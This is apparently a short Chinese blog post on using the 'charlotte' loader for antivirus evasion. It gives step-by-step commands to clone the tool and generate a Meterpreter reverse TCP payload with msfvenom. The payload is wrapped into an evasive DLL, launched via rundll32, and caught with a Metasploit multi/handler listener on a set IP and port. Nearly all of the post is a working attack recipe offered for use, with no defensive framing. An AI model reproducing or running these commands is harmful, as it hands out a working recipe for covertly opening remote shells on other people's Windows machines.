脚本小子免杀的一天

charlotte 低调入过

不点赞的都是龟孙

预览 / Preview

image-20210521140840187

image-20210521140857943

image-20210521140944464

image-20210521174512982

生成payload

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py # 最后一行有个命令 rundll32 xxxxxxxx
rundll32 charlotte.dll, UehQD3rwWxT

运行payload

C:\Windows\System32\rundll32.exe C:\Users\xr\Desktop\charlotte.dll UehQD3rwWxT

监听payload

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.21.129
set lport 53237
run